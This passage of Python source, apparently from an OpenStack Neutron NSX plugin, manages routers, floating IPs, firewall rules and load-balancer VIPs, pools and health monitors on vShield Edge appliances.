if not binding:
super(NsxAdvancedPlugin, self)._delete_lrouter(
context, router_id, nsx_router_id)
else:
#Check whether router has an advanced service inserted.
self.check_router_in_use(context, router_id)
vcns_db.update_vcns_router_binding(
context.session, router_id,
status=service_constants.PENDING_DELETE)
lswitch_id = binding['lswitch_id']
edge_id = binding['edge_id']
# delete lswitch
try:
self.vcns_driver.delete_lswitch(lswitch_id)
except exceptions.ResourceNotFound:
LOG.warning(_("Did not found lswitch %s in NSX"), lswitch_id)
# delete edge
jobdata = {
'context': context
}
self.vcns_driver.delete_edge(router_id, edge_id, jobdata=jobdata)
# delete NSX logical router
routerlib.delete_lrouter(self.cluster, nsx_router_id)
        if router_id in self._router_type:
            del self._router_type[router_id]
def _update_lrouter(self, context, router_id, name, nexthop, routes=None):
if not self._is_advanced_service_router(context, router_id):
return super(NsxAdvancedPlugin, self)._update_lrouter(
context, router_id, name, nexthop, routes=routes)
previous_routes = super(NsxAdvancedPlugin, self)._update_lrouter(
context, router_id, name,
vcns_const.INTEGRATION_EDGE_IPADDRESS, routes=routes)
# TODO(fank): Theoretically users can specify extra routes for
        # physical network, and routes for the physical network need to be
# configured on Edge. This can be done by checking if nexthop is in
# external network. But for now we only handle routes for logic
# space and leave it for future enhancement.
# Let _update_router_gw_info handle nexthop change
#self._vcns_update_static_routes(context, router_id=router_id)
return previous_routes
def _retrieve_and_delete_nat_rules(self, context, floating_ip_address,
internal_ip, router_id,
min_num_rules_expected=0):
# NOP for advanced service router
if not self._is_advanced_service_router(context, router_id):
super(NsxAdvancedPlugin, self)._retrieve_and_delete_nat_rules(
context, floating_ip_address, internal_ip, router_id,
min_num_rules_expected=min_num_rules_expected)
def _update_fip_assoc(self, context, fip, floatingip_db, external_port):
# Update DB model only for advanced service router
router_id = self._get_fip_assoc_data(context, fip, floatingip_db)[2]
if (router_id and
not self._is_advanced_service_router(context, router_id)):
super(NsxAdvancedPlugin, self)._update_fip_assoc(
context, fip, floatingip_db, external_port)
else:
super(base.NsxPluginV2, self)._update_fip_assoc(
context, fip, floatingip_db, external_port)
def _get_nsx_lrouter_status(self, id):
try:
lrouter = routerlib.get_lrouter(self.cluster, id)
lr_status = lrouter["_relations"]["LogicalRouterStatus"]
if lr_status["fabric_status"]:
nsx_status = vcns_const.RouterStatus.ROUTER_STATUS_ACTIVE
else:
nsx_status = vcns_const.RouterStatus.ROUTER_STATUS_DOWN
except n_exc.NotFound:
nsx_status = vcns_const.RouterStatus.ROUTER_STATUS_ERROR
return nsx_status
def _get_vse_status(self, context, id):
binding = vcns_db.get_vcns_router_binding(context.session, id)
edge_status_level = self.vcns_driver.get_edge_status(
binding['edge_id'])
edge_db_status_level = ROUTER_STATUS_LEVEL[binding.status]
if edge_status_level > edge_db_status_level:
return edge_status_level
else:
return edge_db_status_level
def _get_all_nsx_lrouters_statuses(self, tenant_id, fields):
# get nsx lrouters status
nsx_lrouters = routerlib.get_lrouters(self.cluster,
tenant_id,
fields)
nsx_status = {}
for nsx_lrouter in nsx_lrouters:
if (nsx_lrouter["_relations"]["LogicalRouterStatus"]
["fabric_status"]):
nsx_status[nsx_lrouter['uuid']] = (
vcns_const.RouterStatus.ROUTER_STATUS_ACTIVE
)
else:
nsx_status[nsx_lrouter['uuid']] = (
vcns_const.RouterStatus.ROUTER_STATUS_DOWN
)
return nsx_status
def _get_all_vse_statuses(self, context):
bindings = self._model_query(
context, vcns_models.VcnsRouterBinding)
vse_db_status_level = {}
edge_id_to_router_id = {}
router_ids = []
for binding in bindings:
if not binding['edge_id']:
continue
router_id = binding['router_id']
router_ids.append(router_id)
edge_id_to_router_id[binding['edge_id']] = router_id
vse_db_status_level[router_id] = (
ROUTER_STATUS_LEVEL[binding['status']])
if not vse_db_status_level:
# no advanced service router, no need to query
return {}
vse_status_level = {}
edges_status_level = self.vcns_driver.get_edges_statuses()
for edge_id, status_level in edges_status_level.iteritems():
if edge_id in edge_id_to_router_id:
router_id = edge_id_to_router_id[edge_id]
db_status_level = vse_db_status_level[router_id]
if status_level > db_status_level:
vse_status_level[router_id] = status_level
else:
vse_status_level[router_id] = db_status_level
return vse_status_level
def get_router(self, context, id, fields=None):
if fields and 'status' not in fields:
return super(NsxAdvancedPlugin, self).get_router(
context, id, fields=fields)
router = super(NsxAdvancedPlugin, self).get_router(context, id)
router_type = self._find_router_type(router)
if router_type == ROUTER_TYPE_ADVANCED:
vse_status_level = self._get_vse_status(context, id)
if vse_status_level > ROUTER_STATUS_LEVEL[router['status']]:
router['status'] = ROUTER_STATUS[vse_status_level]
return self._fields(router, fields)
def get_routers(self, context, filters=None, fields=None, **kwargs):
routers = super(NsxAdvancedPlugin, self).get_routers(
context, filters=filters, **kwargs)
if fields and 'status' not in fields:
# no status checking, just return regular get_routers
return [self._fields(router, fields) for router in routers]
for router in routers:
router_type = self._find_router_type(router)
if router_type == ROUTER_TYPE_ADVANCED:
break
else:
# no advanced service router, return here
return [self._fields(router, fields) for router in routers]
vse_status_all = self._get_all_vse_statuses(context)
for router in routers:
router_type = self._find_router_type(router)
if router_type == ROUTER_TYPE_ADVANCED:
vse_status_level = vse_status_all.get(router['id'])
if vse_status_level is None:
vse_status_level = (
vcns_const.RouterStatus.ROUTER_STATUS_ERROR)
if vse_status_level > ROUTER_STATUS_LEVEL[router['status']]:
router['status'] = ROUTER_STATUS[vse_status_level]
return [self._fields(router, fields) for router in routers]
def add_router_interface(self, context, router_id, interface_info):
info = super(NsxAdvancedPlugin, self).add_router_interface(
context, router_id, interface_info)
if self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
if router.enable_snat:
self._update_nat_rules(context, router)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._vcns_update_static_routes(context, router=router)
return info
def remove_router_interface(self, context, router_id, interface_info):
info = super(NsxAdvancedPlugin, self).remove_router_interface(
context, router_id, interface_info)
if self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
if router.enable_snat:
self._update_nat_rules(context, router)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._vcns_update_static_routes(context, router=router)
return info
def create_floatingip(self, context, floatingip):
fip = super(NsxAdvancedPlugin, self).create_floatingip(
context, floatingip)
router_id = fip.get('router_id')
if router_id and self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._update_nat_rules(context, router)
self._update_interface(context, router)
return fip
def update_floatingip(self, context, id, floatingip):
fip = super(NsxAdvancedPlugin, self).update_floatingip(
context, id, floatingip)
router_id = fip.get('router_id')
if router_id and self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._update_nat_rules(context, router)
self._update_interface(context, router)
return fip
def delete_floatingip(self, context, id):
fip_db = self._get_floatingip(context, id)
router_id = None
if fip_db.fixed_port_id:
router_id = fip_db.router_id
super(NsxAdvancedPlugin, self).delete_floatingip(context, id)
if router_id and self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._update_interface(context, router)
self._update_nat_rules(context, router)
def disassociate_floatingips(self, context, port_id):
routers = set()
try:
fip_qry = context.session.query(l3_db.FloatingIP)
fip_dbs = fip_qry.filter_by(fixed_port_id=port_id)
for fip_db in fip_dbs:
routers.add(fip_db.router_id)
except sa_exc.NoResultFound:
pass
super(NsxAdvancedPlugin, self).disassociate_floatingips(context,
port_id)
for router_id in routers:
if self._is_advanced_service_router(context, router_id):
router = self._get_router(context, router_id)
# TODO(fank): do rollback on error, or have a dedicated thread
# do sync work (rollback, re-configure, or make router down)
self._update_interface(context, router)
self._update_nat_rules(context, router)
#
# FWaaS plugin implementation
#
def _firewall_set_status(
self, context, firewall_id, status, firewall=None):
with context.session.begin(subtransactions=True):
fw_db = self._get_firewall(context, firewall_id)
if status == service_constants.PENDING_UPDATE and (
fw_db.status == service_constants.PENDING_DELETE):
raise fw_ext.FirewallInPendingState(
firewall_id=firewall_id, pending_state=status)
else:
fw_db.status = status
if firewall:
firewall['status'] = status
def _ensure_firewall_update_allowed(self, context, firewall_id):
fwall = self.get_firewall(context, firewall_id)
if fwall['status'] in [service_constants.PENDING_CREATE,
service_constants.PENDING_UPDATE,
service_constants.PENDING_DELETE]:
raise fw_ext.FirewallInPendingState(firewall_id=firewall_id,
pending_state=fwall['status'])
def _ensure_firewall_policy_update_allowed(
self, context, firewall_policy_id):
firewall_policy = self.get_firewall_policy(context, firewall_policy_id)
for firewall_id in firewall_policy.get('firewall_list', []):
self._ensure_firewall_update_allowed(context, firewall_id)
def _ensure_update_or_delete_firewall_rule(
self, context, firewall_rule_id):
fw_rule = self.get_firewall_rule(context, firewall_rule_id)
if fw_rule.get('firewall_policy_id'):
self._ensure_firewall_policy_update_allowed(
context, fw_rule['firewall_policy_id'])
def _make_firewall_rule_list_by_policy_id(self, context, fw_policy_id):
if not fw_policy_id:
return []
firewall_policy_db = self._get_firewall_policy(context, fw_policy_id)
return [
self._make_firewall_rule_dict(fw_rule_db)
for fw_rule_db in firewall_policy_db['firewall_rules']
]
def _get_edge_id_by_vcns_edge_binding(self, context,
router_id):
#Get vcns_router_binding mapping between router and edge
router_binding = vcns_db.get_vcns_router_binding(
context.session, router_id)
return router_binding.edge_id
def _get_firewall_list_from_firewall_policy(self, context, policy_id):
firewall_policy_db = self._get_firewall_policy(context, policy_id)
return [
self._make_firewall_dict(fw_db)
for fw_db in firewall_policy_db['firewalls']
]
def _get_firewall_list_from_firewall_rule(self, context, rule_id):
rule = self._get_firewall_rule(context, rule_id)
if not rule.firewall_policy_id:
# The firewall rule is not associated with firewall policy yet
return None
return self._get_firewall_list_from_firewall_policy(
context, rule.firewall_policy_id)
def _vcns_update_firewall(self, context, fw, router_id=None, **kwargs):
edge_id = kwargs.get('edge_id')
if not edge_id:
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, router_id)
firewall_rule_list = kwargs.get('firewall_rule_list')
if not firewall_rule_list:
firewall_rule_list = self._make_firewall_rule_list_by_policy_id(
context, fw['firewall_policy_id'])
fw_with_rules = fw
fw_with_rules['firewall_rule_list'] = firewall_rule_list
try:
self.vcns_driver.update_firewall(context, edge_id, fw_with_rules)
except exceptions.VcnsApiException as e:
self._firewall_set_status(
context, fw['id'], service_constants.ERROR)
msg = (_("Failed to create firewall on vShield Edge "
"bound on router %s") % router_id)
LOG.exception(msg)
raise e
except exceptions.VcnsBadRequest as e:
self._firewall_set_status(
context, fw['id'], service_constants.ERROR)
LOG.exception(_("Bad Firewall request Input"))
raise e
def _vcns_delete_firewall(self, context, router_id=None, **kwargs):
edge_id = kwargs.get('edge_id')
if not edge_id:
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, router_id)
#TODO(linb):do rollback on error
self.vcns_driver.delete_firewall(context, edge_id)
def create_firewall(self, context, firewall):
LOG.debug(_("create_firewall() called"))
router_id = firewall['firewall'].get(vcns_const.ROUTER_ID)
self.check_router(context, router_id)
if self._get_resource_router_id_binding(
context, firewall_db.Firewall, router_id=router_id):
msg = _("A firewall is already associated with the router")
LOG.error(msg)
raise nsx_exc.ServiceOverQuota(
overs='firewall', err_msg=msg)
fw = super(NsxAdvancedPlugin, self).create_firewall(context, firewall)
#Add router service insertion binding with firewall object
res = {
'id': fw['id'],
'router_id': router_id
}
self._process_create_resource_router_id(
context, res, firewall_db.Firewall)
        # Since there is only one firewall per edge, this is a bulk
        # configuration operation on the firewall
self._vcns_update_firewall(context, fw, router_id)
self._firewall_set_status(
context, fw['id'], service_constants.ACTIVE, fw)
fw[rsi.ROUTER_ID] = router_id
return fw
def update_firewall(self, context, id, firewall):
LOG.debug(_("update_firewall() called"))
self._ensure_firewall_update_allowed(context, id)
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=id)
rule_list_pre = self._make_firewall_rule_list_by_policy_id(
context,
self.get_firewall(context, id)['firewall_policy_id'])
firewall['firewall']['status'] = service_constants.PENDING_UPDATE
fw = super(NsxAdvancedPlugin, self).update_firewall(
context, id, firewall)
fw[rsi.ROUTER_ID] = service_router_binding['router_id']
rule_list_new = self._make_firewall_rule_list_by_policy_id(
context, fw['firewall_policy_id'])
if rule_list_pre == rule_list_new:
self._firewall_set_status(
context, fw['id'], service_constants.ACTIVE, fw)
return fw
else:
self._vcns_update_firewall(
context, fw, service_router_binding.router_id,
firewall_rule_list=rule_list_new)
self._firewall_set_status(
context, fw['id'], service_constants.ACTIVE, fw)
return fw
def delete_firewall(self, context, id):
LOG.debug(_("delete_firewall() called"))
self._firewall_set_status(
context, id, service_constants.PENDING_DELETE)
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=id)
self._vcns_delete_firewall(context, service_router_binding.router_id)
super(NsxAdvancedPlugin, self).delete_firewall(context, id)
self._delete_resource_router_id_binding(
context, id, firewall_db.Firewall)
def get_firewall(self, context, id, fields=None):
fw = super(NsxAdvancedPlugin, self).get_firewall(
context, id, fields)
if fields and rsi.ROUTER_ID not in fields:
return fw
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
fw[rsi.ROUTER_ID] = service_router_binding['router_id']
return fw
def get_firewalls(self, context, filters=None, fields=None):
fws = super(NsxAdvancedPlugin, self).get_firewalls(
context, filters, fields)
if fields and rsi.ROUTER_ID not in fields:
return fws
service_router_bindings = self._get_resource_router_id_bindings(
context, firewall_db.Firewall,
resource_ids=[fw['id'] for fw in fws])
mapping = dict([(binding['resource_id'], binding['router_id'])
for binding in service_router_bindings])
for fw in fws:
fw[rsi.ROUTER_ID] = mapping[fw['id']]
return fws
def update_firewall_rule(self, context, id, firewall_rule):
LOG.debug(_("update_firewall_rule() called"))
self._ensure_update_or_delete_firewall_rule(context, id)
fwr_pre = self.get_firewall_rule(context, id)
fwr = super(NsxAdvancedPlugin, self).update_firewall_rule(
context, id, firewall_rule)
if fwr_pre == fwr:
return fwr
# check if this rule is associated with firewall
fw_list = self._get_firewall_list_from_firewall_rule(context, id)
if not fw_list:
return fwr
for fw in fw_list:
# get router service insertion binding with firewall id
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, service_router_binding.router_id)
#TODO(linb): do rollback on error
self.vcns_driver.update_firewall_rule(context, id, edge_id, fwr)
return fwr
def update_firewall_policy(self, context, id, firewall_policy):
LOG.debug(_("update_firewall_policy() called"))
self._ensure_firewall_policy_update_allowed(context, id)
firewall_rules_pre = self._make_firewall_rule_list_by_policy_id(
context, id)
fwp = super(NsxAdvancedPlugin, self).update_firewall_policy(
context, id, firewall_policy)
firewall_rules = self._make_firewall_rule_list_by_policy_id(
context, id)
if firewall_rules_pre == firewall_rules:
return fwp
# check if this policy is associated with firewall
fw_list = self._get_firewall_list_from_firewall_policy(context, id)
if not fw_list:
return fwp
for fw in fw_list:
# Get the router_service insertion binding with firewall id
# TODO(fank): optimized by using _get_resource_router_id_bindings
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
self._vcns_update_firewall(
context, fw, service_router_binding.router_id,
firewall_rule_list=firewall_rules)
return fwp
def insert_rule(self, context, id, rule_info):
LOG.debug(_("insert_rule() called"))
self._ensure_firewall_policy_update_allowed(context, id)
fwp = super(NsxAdvancedPlugin, self).insert_rule(
context, id, rule_info)
fwr = super(NsxAdvancedPlugin, self).get_firewall_rule(
context, rule_info['firewall_rule_id'])
# check if this policy is associated with firewall
fw_list = self._get_firewall_list_from_firewall_policy(context, id)
if not fw_list:
return fwp
for fw in fw_list:
# TODO(fank): optimized by using _get_resource_router_id_bindings
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, service_router_binding.router_id)
if rule_info.get('insert_before') or rule_info.get('insert_after'):
#if insert_before or insert_after is set, we would call
#VCNS insert_rule API
#TODO(linb): do rollback on error
self.vcns_driver.insert_rule(context, rule_info, edge_id, fwr)
else:
#Else we would call bulk configuration on the firewall
self._vcns_update_firewall(context, fw, edge_id=edge_id)
return fwp
def remove_rule(self, context, id, rule_info):
LOG.debug(_("remove_rule() called"))
self._ensure_firewall_policy_update_allowed(context, id)
fwp = super(NsxAdvancedPlugin, self).remove_rule(
context, id, rule_info)
fwr = super(NsxAdvancedPlugin, self).get_firewall_rule(
context, rule_info['firewall_rule_id'])
# check if this policy is associated with firewall
fw_list = self._get_firewall_list_from_firewall_policy(context, id)
if not fw_list:
return fwp
for fw in fw_list:
# TODO(fank): optimized by using _get_resource_router_id_bindings
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, service_router_binding.router_id)
#TODO(linb): do rollback on error
self.vcns_driver.delete_firewall_rule(
context, fwr['id'], edge_id)
return fwp
#
# LBAAS service plugin implementation
#
def _get_edge_id_by_vip_id(self, context, vip_id):
try:
service_router_binding = self._get_resource_router_id_binding(
context, loadbalancer_db.Vip, resource_id=vip_id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to find the edge with "
"vip_id: %s"), vip_id)
return self._get_edge_id_by_vcns_edge_binding(
context, service_router_binding.router_id)
def _get_all_vip_addrs_by_router_id(
self, context, router_id):
vip_bindings = self._get_resource_router_id_bindings(
context, loadbalancer_db.Vip, router_ids=[router_id])
vip_addrs = []
for vip_binding in vip_bindings:
vip = self.get_vip(context, vip_binding.resource_id)
vip_addrs.append(vip.get('address'))
return vip_addrs
def _add_router_service_insertion_binding(self, context, resource_id,
router_id,
model):
res = {
'id': resource_id,
'router_id': router_id
}
self._process_create_resource_router_id(context, res,
model)
def _resource_set_status(self, context, model, id, status, obj=None,
pool_id=None):
with context.session.begin(subtransactions=True):
try:
qry = context.session.query(model)
if issubclass(model, loadbalancer_db.PoolMonitorAssociation):
res = qry.filter_by(monitor_id=id,
pool_id=pool_id).one()
else:
res = qry.filter_by(id=id).one()
if status == service_constants.PENDING_UPDATE and (
res.get('status') == service_constants.PENDING_DELETE):
msg = (_("Operation can't be performed, Since resource "
"%(model)s : %(id)s is in DELETEing status!") %
{'model': model,
'id': id})
LOG.error(msg)
raise nsx_exc.NsxPluginException(err_msg=msg)
else:
res.status = status
except sa_exc.NoResultFound:
msg = (_("Resource %(model)s : %(id)s not found!") %
{'model': model,
'id': id})
LOG.exception(msg)
raise nsx_exc.NsxPluginException(err_msg=msg)
if obj:
obj['status'] = status
def _vcns_create_pool_and_monitors(self, context, pool_id, **kwargs):
pool = self.get_pool(context, pool_id)
edge_id = kwargs.get('edge_id')
if not edge_id:
edge_id = self._get_edge_id_by_vip_id(
context, pool['vip_id'])
        #Check whether the pool is already created on the router
        #in case of a future M:N relation between Pool and Vip
#Check associated HealthMonitors and then create them
for monitor_id in pool.get('health_monitors'):
hm = self.get_health_monitor(context, monitor_id)
try:
self.vcns_driver.create_health_monitor(
context, edge_id, hm)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to create healthmonitor "
"associated with pool id: %s!") % pool_id)
for monitor_ide in pool.get('health_monitors'):
if monitor_ide == monitor_id:
break
self.vcns_driver.delete_health_monitor(
context, monitor_ide, edge_id)
#Create the pool on the edge
members = [
super(NsxAdvancedPlugin, self).get_member(
context, member_id)
for member_id in pool.get('members')
]
try:
self.vcns_driver.create_pool(context, edge_id, pool, members)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to create pool on vshield edge"))
self.vcns_driver.delete_pool(
context, pool_id, edge_id)
for monitor_id in pool.get('health_monitors'):
self.vcns_driver.delete_health_monitor(
context, monitor_id, edge_id)
def _vcns_update_pool(self, context, pool, **kwargs):
edge_id = self._get_edge_id_by_vip_id(context, pool['vip_id'])
members = kwargs.get('members')
if not members:
members = [
super(NsxAdvancedPlugin, self).get_member(
context, member_id)
for member_id in pool.get('members')
]
self.vcns_driver.update_pool(context, edge_id, pool, members)
def create_vip(self, context, vip):
LOG.debug(_("create_vip() called"))
router_id = vip['vip'].get(vcns_const.ROUTER_ID)
self.check_router(context, router_id)
#Check whether the vip port is an external port
subnet_id = vip['vip']['subnet_id']
network_id = self.get_subnet(context, subnet_id)['network_id']
ext_net = self._get_network(context, network_id)
if not ext_net.external:
msg = (_("Network '%s' is not a valid external "
"network") % network_id)
raise nsx_exc.NsxPluginException(err_msg=msg)
v = super(NsxAdvancedPlugin, self).create_vip(context, vip)
#Get edge_id for the resource
router_binding = vcns_db.get_vcns_router_binding(
context.session,
router_id)
edge_id = router_binding.edge_id
#Add vip_router binding
self._add_router_service_insertion_binding(context, v['id'],
router_id,
loadbalancer_db.Vip)
#Create the vip port on vShield Edge
router = self._get_router(context, router_id)
self._update_interface(context, router, sync=True)
#Create the vip and associated pool/monitor on the corresponding edge
try:
self._vcns_create_pool_and_monitors(
context, v['pool_id'], edge_id=edge_id)
self.vcns_driver.create_vip(context, edge_id, v)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to create vip!"))
self._delete_resource_router_id_binding(
context, v['id'], loadbalancer_db.Vip)
super(NsxAdvancedPlugin, self).delete_vip(context, v['id'])
self._resource_set_status(context, loadbalancer_db.Vip,
v['id'], service_constants.ACTIVE, v)
v[rsi.ROUTER_ID] = router_id
return v
def update_vip(self, context, id, vip):
edge_id = self._get_edge_id_by_vip_id(context, id)
old_vip = self.get_vip(context, id)
session_persistence_update = bool(
vip['vip'].get('session_persistence'))
vip['vip']['status'] = service_constants.PENDING_UPDATE
v = super(NsxAdvancedPlugin, self).update_vip(context, id, vip)
v[rsi.ROUTER_ID] = self._get_resource_router_id_binding(
context, loadbalancer_db.Vip, resource_id=id)['router_id']
if old_vip['pool_id'] != v['pool_id']:
self.vcns_driver.delete_vip(context, id)
#Delete old pool/monitor on the edge
            #TODO(linb): Factor out the procedure for removing the pool and
            #health monitor into a separate method
old_pool = self.get_pool(context, old_vip['pool_id'])
self.vcns_driver.delete_pool(
context, old_vip['pool_id'], edge_id)
for monitor_id in old_pool.get('health_monitors'):
self.vcns_driver.delete_health_monitor(
context, monitor_id, edge_id)
#Create new pool/monitor object on the edge
#TODO(linb): add exception handle if error
self._vcns_create_pool_and_monitors(
context, v['pool_id'], edge_id=edge_id)
self.vcns_driver.create_vip(context, edge_id, v)
return v
try:
self.vcns_driver.update_vip(context, v, session_persistence_update)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update vip with id: %s!"), id)
self._resource_set_status(context, loadbalancer_db.Vip,
id, service_constants.ERROR, v)
self._resource_set_status(context, loadbalancer_db.Vip,
v['id'], service_constants.ACTIVE, v)
return v
def delete_vip(self, context, id):
v = self.get_vip(context, id)
self._resource_set_status(
context, loadbalancer_db.Vip,
id, service_constants.PENDING_DELETE)
try:
self.vcns_driver.delete_vip(context, id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to delete vip with id: %s!"), id)
self._resource_set_status(context, loadbalancer_db.Vip,
id, service_constants.ERROR)
edge_id = self._get_edge_id_by_vip_id(context, id)
#Check associated HealthMonitors and then delete them
pool = self.get_pool(context, v['pool_id'])
self.vcns_driver.delete_pool(context, v['pool_id'], edge_id)
for monitor_id in pool.get('health_monitors'):
#TODO(linb): do exception handle if error
self.vcns_driver.delete_health_monitor(
context, monitor_id, edge_id)
router_binding = self._get_resource_router_id_binding(
context, loadbalancer_db.Vip, resource_id=id)
router = self._get_router(context, router_binding.router_id)
self._delete_resource_router_id_binding(
context, id, loadbalancer_db.Vip)
super(NsxAdvancedPlugin, self).delete_vip(context, id)
self._update_interface(context, router, sync=True)
def get_vip(self, context, id, fields=None):
vip = super(NsxAdvancedPlugin, self).get_vip(context, id, fields)
if fields and rsi.ROUTER_ID not in fields:
return vip
service_router_binding = self._get_resource_router_id_binding(
context, loadbalancer_db.Vip, resource_id=vip['id'])
vip[rsi.ROUTER_ID] = service_router_binding['router_id']
return vip
def get_vips(self, context, filters=None, fields=None):
vips = super(NsxAdvancedPlugin, self).get_vips(
context, filters, fields)
if fields and rsi.ROUTER_ID not in fields:
return vips
service_router_bindings = self._get_resource_router_id_bindings(
context, loadbalancer_db.Vip,
resource_ids=[vip['id'] for vip in vips])
mapping = dict([(binding['resource_id'], binding['router_id'])
for binding in service_router_bindings])
for vip in vips:
vip[rsi.ROUTER_ID] = mapping[vip['id']]
return vips
def update_pool(self, context, id, pool):
pool['pool']['status'] = service_constants.PENDING_UPDATE
p = super(NsxAdvancedPlugin, self).update_pool(context, id, pool)
#Check whether the pool is already associated with the vip
if not p.get('vip_id'):
self._resource_set_status(context, loadbalancer_db.Pool,
p['id'], service_constants.ACTIVE, p)
return p
try:
self._vcns_update_pool(context, p)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update pool with id: %s!"), id)
self._resource_set_status(context, loadbalancer_db.Pool,
p['id'], service_constants.ERROR, p)
self._resource_set_status(context, loadbalancer_db.Pool,
p['id'], service_constants.ACTIVE, p)
return p
def create_member(self, context, member):
m = super(NsxAdvancedPlugin, self).create_member(context, member)
pool_id = m.get('pool_id')
pool = self.get_pool(context, pool_id)
if not pool.get('vip_id'):
self._resource_set_status(context, loadbalancer_db.Member,
m['id'], service_constants.ACTIVE, m)
return m
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id,
service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update pool with the member"))
super(NsxAdvancedPlugin, self).delete_member(context, m['id'])
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
self._resource_set_status(context, loadbalancer_db.Member,
m['id'], service_constants.ACTIVE, m)
return m
def update_member(self, context, id, member):
member['member']['status'] = service_constants.PENDING_UPDATE
old_member = self.get_member(context, id)
m = super(NsxAdvancedPlugin, self).update_member(
context, id, member)
if m['pool_id'] != old_member['pool_id']:
old_pool_id = old_member['pool_id']
old_pool = self.get_pool(context, old_pool_id)
if old_pool.get('vip_id'):
self._resource_set_status(
context, loadbalancer_db.Pool,
old_pool_id, service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, old_pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update old pool "
"with the member"))
super(NsxAdvancedPlugin, self).delete_member(
context, m['id'])
self._resource_set_status(
context, loadbalancer_db.Pool,
old_pool_id, service_constants.ACTIVE)
pool_id = m['pool_id']
pool = self.get_pool(context, pool_id)
if not pool.get('vip_id'):
self._resource_set_status(context, loadbalancer_db.Member,
m['id'], service_constants.ACTIVE, m)
return m
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id,
service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update pool with the member"))
super(NsxAdvancedPlugin, self).delete_member(
context, m['id'])
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
self._resource_set_status(context, loadbalancer_db.Member,
m['id'], service_constants.ACTIVE, m)
return m
def delete_member(self, context, id):
m = self.get_member(context, id)
super(NsxAdvancedPlugin, self).delete_member(context, id)
pool_id = m['pool_id']
pool = self.get_pool(context, pool_id)
if not pool.get('vip_id'):
return
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id, service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update pool with the member"))
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
def update_health_monitor(self, context, id, health_monitor):
old_hm = super(NsxAdvancedPlugin, self).get_health_monitor(
context, id)
hm = super(NsxAdvancedPlugin, self).update_health_monitor(
context, id, health_monitor)
for hm_pool in hm.get('pools'):
pool_id = hm_pool['pool_id']
pool = self.get_pool(context, pool_id)
if pool.get('vip_id'):
edge_id = self._get_edge_id_by_vip_id(
context, pool['vip_id'])
try:
self.vcns_driver.update_health_monitor(
context, edge_id, old_hm, hm)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update monitor "
"with id: %s!"), id)
return hm
def create_pool_health_monitor(self, context,
health_monitor, pool_id):
monitor_id = health_monitor['health_monitor']['id']
pool = self.get_pool(context, pool_id)
monitors = pool.get('health_monitors')
if len(monitors) > 0:
msg = _("Vcns right now can only support "
"one monitor per pool")
LOG.error(msg)
raise nsx_exc.NsxPluginException(err_msg=msg)
#Check whether the pool is already associated with the vip
if not pool.get('vip_id'):
res = super(NsxAdvancedPlugin,
self).create_pool_health_monitor(context,
health_monitor,
pool_id)
return res
#Get the edge_id
edge_id = self._get_edge_id_by_vip_id(context, pool['vip_id'])
res = super(NsxAdvancedPlugin,
self).create_pool_health_monitor(context,
health_monitor,
pool_id)
monitor = self.get_health_monitor(context, monitor_id)
        #TODO(linb): Add exception handling on error
self.vcns_driver.create_health_monitor(context, edge_id, monitor)
#Get updated pool
pool['health_monitors'].append(monitor['id'])
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to associate monitor with pool!"))
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.ERROR)
super(NsxAdvancedPlugin, self).delete_pool_health_monitor(
context, monitor_id, pool_id)
self._resource_set_status(
